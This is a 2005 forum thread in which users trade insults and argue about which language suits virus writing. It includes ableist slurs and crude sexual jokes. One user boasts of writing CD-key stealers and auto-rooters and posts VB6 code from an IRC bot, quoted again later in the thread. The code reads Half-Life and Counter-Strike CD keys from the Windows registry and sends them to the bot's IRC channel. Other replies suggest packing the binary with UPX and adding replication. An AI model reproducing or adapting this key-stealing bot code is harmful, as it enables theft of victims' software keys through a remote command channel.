June 29, 200519 yr TerMight" is spelt using some leetspeak do one: my apprecation for the internet culture two: because TerMight is a copyrighted name, and I cant infringe upon that. <sarcasm> Yes, such a believable excuse. </sarcasm> Would this reason also apply to why you fail at spelling and simple grammar?
June 29, 200519 yr how about #include <stdio.h> void main(void) { printf("Hello World"); } #include <cstdio> int main() { std::printf("Hello World"); } Stdio.h and any other header that exists with a 'c' prefix also, are outdated. It's OK if you meant it to be pure C tho ;)
June 29, 200519 yr Yeah I picked the wrong username, sorry. I was looking at the post by viperx and paine, and somehow or another got your names mixed up. Sorry about that guy. no prob man, at least someone here is decent enough to not be an ass hole ^_^ I commend you.
June 29, 200519 yr #include <cstdio> int main() { std::printf("Hello World"); } Stdio.h and any other header that exists with a 'c' prefix also, are outdated. It's OK if you meant it to be pure C tho ;) either way, it pwns VB :dfinger:
June 29, 200519 yr Nostromo']VB is shit for writing a virus. Write your virus in c/asm. k,thx. asm really wouldn't be the best choice either. c++ would probablly be the best virus writing language.
June 29, 200519 yr Assembly can do some things C++ cannot. So implementing some assembly would be a good idea. Also C++ isn't software.
June 29, 200519 yr Assembly can do some things C++ cannot. So implementing some assembly would be a good idea. Also C++ isn't software. Yeah that was a typo.
June 29, 200519 yr I've coded some very nice things in VB6 , CD-Key Stealers, Port Scanners, Auto-Rooters (front end exploit + auto tftp session), IRC Bots plus a handfull of other goodies, its a very very easy language and is fairly portable. (seeing as the Visual Basic 6.0 Runtime is included with all versions of .NET and XP and i *think* 2000, However the Winsock Control isnt...so upx that shit and incl it with your exe , mswinsck.ocx) ElseIf Mid$(msg, 1, 3) = "!hl" Then HLKey = GetStringValue("HKEY_CURRENT_USER\Software\Valve\Half-Life\Settings", "Key") If HLKey = "Error" Then Else HLKey = Left(HLKey, InStr(HLKey, Chr(0)) - 1) Winsock1.SendData "PRIVMSG " & BotChan & " :[HL Key]: " & HLKey & vbCrLf End If ElseIf Mid$(msg, 1, 3) = "!cs" Then CSKey = GetStringValue("HKEY_CURRENT_USER\Software\Valve\Counter-Strike\Settings", "Key") If CSKey = "Error" Then Else CSKey = Left(CSKey, InStr(CSKey, Chr(0)) - 1) Winsock1.SendData "PRIVMSG " & BotChan & " :[CS Key]: " & CSKey & vbCrLf End If Code from an IRC Bot (not public afaik)
June 29, 200519 yr I've coded some very nice things in VB6 , CD-Key Stealers, Port Scanners, Auto-Rooters (front end exploit + auto tftp session), IRC Bots plus a handfull of other goodies, its a very very easy language and is fairly portable. (seeing as the Visual Basic 6.0 Runtime is included with all versions of .NET and XP and i *think* 2000, However the Winsock Control isnt...so upx that shit and incl it with your exe , mswinsck.ocx) ElseIf Mid$(msg, 1, 3) = "!hl" Then HLKey = GetStringValue("HKEY_CURRENT_USER\Software\Valve\Half-Life\Settings", "Key") If HLKey = "Error" Then Else HLKey = Left(HLKey, InStr(HLKey, Chr(0)) - 1) Winsock1.SendData "PRIVMSG " & BotChan & " :[HL Key]: " & HLKey & vbCrLf End If ElseIf Mid$(msg, 1, 3) = "!cs" Then CSKey = GetStringValue("HKEY_CURRENT_USER\Software\Valve\Counter-Strike\Settings", "Key") If CSKey = "Error" Then Else CSKey = Left(CSKey, InStr(CSKey, Chr(0)) - 1) Winsock1.SendData "PRIVMSG " & BotChan & " :[CS Key]: " & CSKey & vbCrLf End If Code from an IRC Bot (not public afaik) thank god, someone with sense. VB is a great language, if it wasnt, why in the hell would Microsoft continue to sell the VB IDE?? Theres many things you can do with it, Including process memory hijacking, and other very usefull NT API goodies.
June 30, 200519 yr thank god, someone with sense. VB is a great language, if it wasnt, why in the hell would Microsoft continue to sell the VB IDE?? Theres many things you can do with it, Including process memory hijacking, and other very usefull NT API goodies. you try too hard to look like the leetest coder in teh world
June 30, 200519 yr K blue........... Will they stop us haxing? Anywayz, you guys try to make for example an OS with VB. C++ (Mostly C for OS'es) and assembly has many more possibilities and fills less ;)
June 30, 200519 yr VB can do just as much as C++ it cant make an operating system. yuo = fail edit:damn vipe beat me to it :(
June 30, 200519 yr Binary 0wnz jo0 all. 01010100001001011110000101010101010100100000111010100011101000 101010100100000111010101101000101010100100000111010100011101000011101000101010100100000111010100011101000110100010101010010000011101010001110100101010100100000111010100011101000101010100100000111010001010101001000001110101000111010011010100011101000101010100100000111010111010001010101001000001110101000111010000011101000101010100100000111010100011101110100010101010010000011101010001110100 WARNING: If you execute the above code you will break the interweb.
June 30, 200519 yr MY MOM HAS A VIRUS IN HER VAGINA I THINK ITS S;PORKEH sorry, your mom came in IRC and I had to :(
June 30, 200519 yr Actually, people claiming that it won't work due to missing runtimes aren't quite correct. Literally 95%+ of XP systems have the VB6 runtimes from the time of install, and those older editions that don't usually get them legit-style via automatic update. However, I don't consider VB6 to be fast or stable enough for **** nets, rendering is psuedo useless. Also, just go to planetsourcecode.com for all that stuff. Also, your "virus" will suck ass without a way to replicate, and you need to know C to start analyzing exploit tools out there. Better yet, jack methods from other code. VB6 isn't made for this captain tard.
June 30, 200519 yr Actually, people claiming that it won't work due to missing runtimes aren't quite correct. Literally 95%+ of XP systems have the VB6 runtimes from the time of install, and those older editions that don't usually get them legit-style via automatic update. However, I don't consider VB6 to be fast or stable enough for **** nets, rendering is psuedo useless. Also, just go to planetsourcecode.com for all that stuff. Also, your "virus" will suck ass without a way to replicate, and you need to know C to start analyzing exploit tools out there. Better yet, jack methods from other code. VB6 isn't made for this captain tard. cant replicate itself?? what are you talking about, give me an example of replcation.
July 1, 200519 yr cant replicate itself?? what are you talking about, give me an example of replcation. your making yourself look like a 5yr old with downs syndrome
July 1, 200519 yr your making yourself look like a 5yr old with downs syndrome hey.. I am a 5yr old with down syndrome.....
July 1, 200519 yr VB is alright for really high level stuff.. but if you want speed or power use c++. C++ lets you directly manipulate the heap, work with pointers and use inline assembly - which turn it from 'high level' to 'high/low level' People say for maximum speed and power, use ASM, which is true - but ASM doesnt offer much in the way of object orienteering so managing a huge project might be a little Overwhelming :) When it comes down to it, nobody should really limit themselves to one language and fool themselves into thinking it can do everything :rolleyes: